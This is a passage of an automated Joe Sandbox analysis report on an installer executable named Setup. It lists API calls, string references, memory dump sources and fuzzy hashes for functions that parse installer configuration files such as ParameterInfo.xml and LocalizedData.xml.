                                                                                                                                                                     • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Value$CloseOpen$AttributesCreateFileH_prolog3Query
                                                                                                                                                                    • String ID: EventMessageFile$System\CurrentControlSet\Services\Eventlog\Application\VSSetup$TypesSupported
                                                                                                                                                                    • API String ID: 4021642227-369282485
                                                                                                                                                                    • Opcode ID: 9b0e3d7bc84d991c3c25a32cfa0f2bc20d579690c5f8420a11717fe36bf5eeab
                                                                                                                                                                    • Instruction ID: f4fb9a8adbdace70cf2fa96811b9404462d43b0094ca5be7842d1db3a9cb2c72
                                                                                                                                                                    • Opcode Fuzzy Hash: 9b0e3d7bc84d991c3c25a32cfa0f2bc20d579690c5f8420a11717fe36bf5eeab
                                                                                                                                                                    • Instruction Fuzzy Hash: 86118B71A4022CBBEB309B168C8DFEBBF6DEB52755F4044A5B519E6180C6B09E44CBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetStartupInfoW.KERNEL32(698D14A0,698F91D6), ref: 698FA31E
                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 698FA32A
                                                                                                                                                                      • Part of subcall function 698F9F70: Sleep.KERNEL32(00000000,?,698F91D6,?), ref: 698F9F98
                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 698FA3CA
                                                                                                                                                                    • GetFileType.KERNEL32(74C08559,00000001,698F91D6), ref: 698FA451
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __calloc_crt$FileInfoSleepStartupType
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 591920814-0
                                                                                                                                                                    • Opcode ID: 3e10e65558a86e8843bb6ae3ca79d24cdd2190d04728235e8f685bc1e3fe3fbb
                                                                                                                                                                    • Instruction ID: 92a5df93b7c55bcad93c19a6618627a42d651ddf35aecc79d122c4e05106de4c
                                                                                                                                                                    • Opcode Fuzzy Hash: 3e10e65558a86e8843bb6ae3ca79d24cdd2190d04728235e8f685bc1e3fe3fbb
                                                                                                                                                                    • Instruction Fuzzy Hash: EA6116729087418FDB00CF68C889B2977A4BF6A3B4F14AA6CD566DB2E1F730D406CB55
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetStartupInfoW.KERNEL32(?,69DCC0C9), ref: 69DCDB0F
                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 69DCDB1B
                                                                                                                                                                      • Part of subcall function 69DCD761: Sleep.KERNEL32(00000000,?,69DCC0C9,69DAF845,00000C00,00000020,69DAF845,?), ref: 69DCD789
                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 69DCDBBB
                                                                                                                                                                    • GetFileType.KERNEL32(?,00000001,69DCC0C9), ref: 69DCDC42
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __calloc_crt$FileInfoSleepStartupType
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 591920814-0
                                                                                                                                                                    • Opcode ID: 76176b82c7d0527400104c30ead97d746782aade72adf5b19150a34565bd5886
                                                                                                                                                                    • Instruction ID: 93c5caefb35f938745a8effe79324f845774a0a184c238f4deb142f3a1c9a00b
                                                                                                                                                                    • Opcode Fuzzy Hash: 76176b82c7d0527400104c30ead97d746782aade72adf5b19150a34565bd5886
                                                                                                                                                                    • Instruction Fuzzy Hash: 12610071984741CFE7008F68CE88B197BA8BF4A325F24877AC5A6CB6E1E770D401CB12
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D7B326
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D7B25F: __EH_prolog3.LIBCMT ref: 69D7B266
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D7B5A8
                                                                                                                                                                    Strings
                                                                                                                                                                    • No DisabledCommandLineSwitches block was specified, xrefs: 69D7B5C8
                                                                                                                                                                    • Disabled CommandLineSwitch added: , xrefs: 69D7B406, 69D7B4C5
                                                                                                                                                                    • The DisabledCommandLineSwitches block has no CommandLineSwitches specified - either add them or remove the DisabledCommandLineSwit, xrefs: 69D7B546
                                                                                                                                                                    • DisabledCommandLineSwitches, xrefs: 69D7B353
                                                                                                                                                                    • ParameterInfo.xml, xrefs: 69D7B554
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw
                                                                                                                                                                    • String ID: Disabled CommandLineSwitch added: $DisabledCommandLineSwitches$No DisabledCommandLineSwitches block was specified$ParameterInfo.xml$The DisabledCommandLineSwitches block has no CommandLineSwitches specified - either add them or remove the DisabledCommandLineSwit
                                                                                                                                                                    • API String ID: 2489616738-1449725936
                                                                                                                                                                    • Opcode ID: 100ce7229c6608dd1e608ca0434824a9f682a4c084763fefd019507f7ac60f23
                                                                                                                                                                    • Instruction ID: 99cdbe9d8f81583e0d7f851d14c6c3996646d6610e3261f52366b987c49c6342
                                                                                                                                                                    • Opcode Fuzzy Hash: 100ce7229c6608dd1e608ca0434824a9f682a4c084763fefd019507f7ac60f23
                                                                                                                                                                    • Instruction Fuzzy Hash: DAA17A71900249DFCF01CFA8C984AAEBBB9BF95318F2485A9E111EB790C735DE45CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D849D5
                                                                                                                                                                      • Part of subcall function 69D739AD: __EH_prolog3.LIBCMT ref: 69D739B4
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D84A3C
                                                                                                                                                                      • Part of subcall function 69DD14AA: KiUserExceptionDispatcher.NTDLL(?,?,69DCC129,00000C00,?,?,?,?,69DCC129,00000C00,69DEBA3C,69E076D4,00000C00,00000020,69DAF845,?), ref: 69DD14EC
                                                                                                                                                                      • Part of subcall function 69D795C1: __EH_prolog3.LIBCMT ref: 69D795C8
                                                                                                                                                                      • Part of subcall function 69D795C1: VariantInit.OLEAUT32(?), ref: 69D795DB
                                                                                                                                                                      • Part of subcall function 69D795C1: SysFreeString.OLEAUT32(?), ref: 69D7960E
                                                                                                                                                                      • Part of subcall function 69D795C1: VariantClear.OLEAUT32(00000008), ref: 69D7962E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Variant$ClearDispatcherExceptionException@8FreeInitStringThrowUser
                                                                                                                                                                    • String ID: Language$LocalizedText$Text$Unable to find Language element for LangID="%d" in localized data$W
                                                                                                                                                                    • API String ID: 452683132-1012890799
                                                                                                                                                                    • Opcode ID: 324e64a97586b027764cad4cd90477bf38f71d054f4e3bd3ef27b5d45dd5341d
                                                                                                                                                                    • Instruction ID: f4a79e2010069dd44538335da9a272612f18e881e25867098daccafcc3f912c2
                                                                                                                                                                    • Opcode Fuzzy Hash: 324e64a97586b027764cad4cd90477bf38f71d054f4e3bd3ef27b5d45dd5341d
                                                                                                                                                                    • Instruction Fuzzy Hash: C2914DB1900259EFCF01CFA8C984ADEBBB9BF49718F148569F414EB741C735AA05CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D82E48: __EH_prolog3.LIBCMT ref: 69D82E4F
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D991B1
                                                                                                                                                                    Strings
                                                                                                                                                                    • : SuccessBlockers evaluated to true., xrefs: 69D991E8
                                                                                                                                                                    • Checking for global blockers, xrefs: 69D990A8
                                                                                                                                                                    • : StopBlockers evaluated to true., xrefs: 69D99209
                                                                                                                                                                    • Global Block Checks, xrefs: 69D99087, 69D990B7
                                                                                                                                                                    • no blocking conditions found, xrefs: 69D99078
                                                                                                                                                                    • : WarnBlockers evaluated to true., xrefs: 69D9921D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw
                                                                                                                                                                    • String ID: no blocking conditions found$: StopBlockers evaluated to true.$: SuccessBlockers evaluated to true.$: WarnBlockers evaluated to true.$Checking for global blockers$Global Block Checks
                                                                                                                                                                    • API String ID: 2489616738-2937627051
                                                                                                                                                                    • Opcode ID: df5624c69565f3a4421daf0a9767aa03eaa7366bdbd4807c6a750123e7a0627c
                                                                                                                                                                    • Instruction ID: c6c5f2be570cf6465b8459ea0145f0960eade95789565843d0d4c8cf8ed8b0ff
                                                                                                                                                                    • Opcode Fuzzy Hash: df5624c69565f3a4421daf0a9767aa03eaa7366bdbd4807c6a750123e7a0627c
                                                                                                                                                                    • Instruction Fuzzy Hash: 977145B1408345AFC710DF59C984A5BFBE9FF89708F804A2EF58583A50D371E949CB62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D838A8
                                                                                                                                                                      • Part of subcall function 69D78D44: __EH_prolog3.LIBCMT ref: 69D78D4B
                                                                                                                                                                      • Part of subcall function 69D83480: __EH_prolog3.LIBCMT ref: 69D83487
                                                                                                                                                                    Strings
                                                                                                                                                                    • Create CustomErrorRetry object, xrefs: 69D8399C
                                                                                                                                                                    • Create CustomErrorMappingBase object, xrefs: 69D83A51
                                                                                                                                                                    • schema validation failure: More than 1 CustomError Mapping block defined., xrefs: 69D838D1
                                                                                                                                                                    • The mapping element defined: , xrefs: 69D83951
                                                                                                                                                                    • Retry, xrefs: 69D83983, 69D839B9
                                                                                                                                                                    • ParameterInfo.xml, xrefs: 69D838E3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID: Create CustomErrorMappingBase object$Create CustomErrorRetry object$ParameterInfo.xml$Retry$The mapping element defined: $schema validation failure: More than 1 CustomError Mapping block defined.
                                                                                                                                                                    • API String ID: 431132790-1753673958
                                                                                                                                                                    • Opcode ID: 42fbec0faa2823f05d125229b4dd1c21fb7b0abeab0b7b19e86a0cd4d79d373c
                                                                                                                                                                    • Instruction ID: a9565b6097fb3cd792ba5d9b61b05f27626beb78124b909fcdd51c7f729731dc
                                                                                                                                                                    • Opcode Fuzzy Hash: 42fbec0faa2823f05d125229b4dd1c21fb7b0abeab0b7b19e86a0cd4d79d373c
                                                                                                                                                                    • Instruction Fuzzy Hash: EC516D71900249EBDF10DBE8C945BAEB7F8BF09318F108168E515FB691DB75DA04CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D7B014
                                                                                                                                                                      • Part of subcall function 69DA91AF: CoCreateInstance.OLE32(69D6A974,00000000,00000017,69D6A9A4,?,?,69D7B029,?,0000002C,69DBD55B,?,?,?,?,00000001), ref: 69DA91C5
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 69D7B044
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D7B128
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 69D7B163
                                                                                                                                                                      • Part of subcall function 69D739AD: __EH_prolog3.LIBCMT ref: 69D739B4
                                                                                                                                                                    Strings
                                                                                                                                                                    • m_spDoc->loadXML() failed. Parse error is: %s, xrefs: 69D7B1CB
                                                                                                                                                                    • CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d, xrefs: 69D7B033
                                                                                                                                                                    • m_spDoc->get_documentElement() failed. Parse error is: %s, xrefs: 69D7B0F6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeH_prolog3String$CreateException@8InstanceThrow
                                                                                                                                                                    • String ID: CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d$m_spDoc->get_documentElement() failed. Parse error is: %s$m_spDoc->loadXML() failed. Parse error is: %s
                                                                                                                                                                    • API String ID: 1763430278-2525052916
                                                                                                                                                                    • Opcode ID: 3d3e2fd192ea70e1b3f89f6d6b4801dd974b49b914737ff8bc2ff9cd31dad0e6
                                                                                                                                                                    • Instruction ID: d0b40ab4914d47ee7368a1a797b9c5218d934d0831c281659c4188db22c67192
                                                                                                                                                                    • Opcode Fuzzy Hash: 3d3e2fd192ea70e1b3f89f6d6b4801dd974b49b914737ff8bc2ff9cd31dad0e6
                                                                                                                                                                    • Instruction Fuzzy Hash: E4518171800249EFDB10DFE8C884DEEBBB8BF15318F548579E551AB690DB349A48CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 69D78168: GetFileSize.KERNEL32(?,?,?,?,?,69DA3B9F,?,?,00000000,?,?,?,?,00000008,69DAEC79,?), ref: 69D78178
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000), ref: 69DB2CA8
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69DB2CE7
                                                                                                                                                                    • CopyFileW.KERNEL32(00000010,00000000,00000000,?), ref: 69DB2D19
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 69DB2D32
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D78329: __EH_prolog3.LIBCMT ref: 69D78330
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$H_prolog3$AttributesCopyException@8ExistsPathSizeThrow
                                                                                                                                                                    • String ID: Copy of Header File failed$DHTML Header File doesn't exist$DHTMLLogger
                                                                                                                                                                    • API String ID: 1055460099-1824744887
                                                                                                                                                                    • Opcode ID: 1ab906b28bec2ebb2bac53b09cb5a14deb622c94d22faf87313f5bebc6234bd9
                                                                                                                                                                    • Instruction ID: 712e992137435d5cafe9529ec570cf52075604b7d9d3d70434fb53228c78812f
                                                                                                                                                                    • Opcode Fuzzy Hash: 1ab906b28bec2ebb2bac53b09cb5a14deb622c94d22faf87313f5bebc6234bd9
                                                                                                                                                                    • Instruction Fuzzy Hash: 48513BB20083849FD710DFA4C880E5ABBE8BF99358F404A3DF1959BA94D734D6098B63
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DA4E77
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D75FCE: __EH_prolog3.LIBCMT ref: 69D75FD5
                                                                                                                                                                      • Part of subcall function 69D75FCE: PathIsRelativeW.SHLWAPI(?,?,?,?,?,ParameterInfo.xml,?,?,00000738,69DAFA6E,?,69D6A794,02602230), ref: 69D76018
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69DA4F68
                                                                                                                                                                      • Part of subcall function 69DD14AA: KiUserExceptionDispatcher.NTDLL(?,?,69DCC129,00000C00,?,?,?,?,69DCC129,00000C00,69DEBA3C,69E076D4,00000C00,00000020,69DAF845,?), ref: 69DD14EC
                                                                                                                                                                      • Part of subcall function 69D7838A: __EH_prolog3.LIBCMT ref: 69D78391
                                                                                                                                                                      • Part of subcall function 69D7A378: __EH_prolog3.LIBCMT ref: 69D7A37F
                                                                                                                                                                    • ReadFile.KERNEL32(?,?,00000002,?,00000000,?,80000000,00000001,00000003,00000080,00000000,?,?,?,?,0000002C), ref: 69DA4F7E
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?), ref: 69DA4FA1
                                                                                                                                                                      • Part of subcall function 69D78329: __EH_prolog3.LIBCMT ref: 69D78330
                                                                                                                                                                      • Part of subcall function 69D7A3BC: __EH_prolog3.LIBCMT ref: 69D7A3C3
                                                                                                                                                                    Strings
                                                                                                                                                                    • File %s could not be opened for read, xrefs: 69DA4F0F
                                                                                                                                                                    • File %s is not UTF-16 with Byte Order Marks (BOM), xrefs: 69DA4FCC
                                                                                                                                                                    • ParameterInfo.xml, xrefs: 69DA4FE5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$ChangeCloseDispatcherExceptionException@8FileFindNotificationPathReadRelativeThrowUser
                                                                                                                                                                    • String ID: File %s could not be opened for read$File %s is not UTF-16 with Byte Order Marks (BOM)$ParameterInfo.xml
                                                                                                                                                                    • API String ID: 2138378564-652212332
                                                                                                                                                                    • Opcode ID: 74a10a99fec4bb2450383291a1074b83f56150eb786e19217b8c11212d2334f0
                                                                                                                                                                    • Instruction ID: b50f395296ec9b51486ccbf61dede10ac19a330cdd54d9254cb9234fdb128b12
                                                                                                                                                                    • Opcode Fuzzy Hash: 74a10a99fec4bb2450383291a1074b83f56150eb786e19217b8c11212d2334f0
                                                                                                                                                                    • Instruction Fuzzy Hash: 84512871800249EFDF11DFE8C984ADEBBB9AF05318F109175E115FB691DB309A188B72
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D854B8
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D85540
                                                                                                                                                                      • Part of subcall function 69D7A378: __EH_prolog3.LIBCMT ref: 69D7A37F
                                                                                                                                                                    Strings
                                                                                                                                                                    • W, xrefs: 69D85530
                                                                                                                                                                    • Schema validation failure in file , xrefs: 69D85575
                                                                                                                                                                    • Unable to find Language element for LangID="%d" in localized data, xrefs: 69D8551A
                                                                                                                                                                    • \LocalizedData.xml: should have atleast one 'Language' child element!, xrefs: 69D85599
                                                                                                                                                                    • ParameterInfo.xml, xrefs: 69D85565
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw
                                                                                                                                                                    • String ID: ParameterInfo.xml$Schema validation failure in file $Unable to find Language element for LangID="%d" in localized data$W$\LocalizedData.xml: should have atleast one 'Language' child element!
                                                                                                                                                                    • API String ID: 2489616738-3464115581
                                                                                                                                                                    • Opcode ID: 244b39deccc6e474475b525dc7c520d103970d77e80c66af540f5658776cdba2
                                                                                                                                                                    • Instruction ID: 1cd5bde85a6d3d94126f8be8ba3fadc338f755e4e2b306855518f402bd9f9c71
                                                                                                                                                                    • Opcode Fuzzy Hash: 244b39deccc6e474475b525dc7c520d103970d77e80c66af540f5658776cdba2
                                                                                                                                                                    • Instruction Fuzzy Hash: A3416B75900249EFDF10DBE8C944BADBBB9AF19318F1481A8F015EB681DB35DA04CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 69DA7F74
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    • _memset.LIBCMT ref: 69DA7FD4
                                                                                                                                                                    • GetVersionExW.KERNEL32 ref: 69DA7FED
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
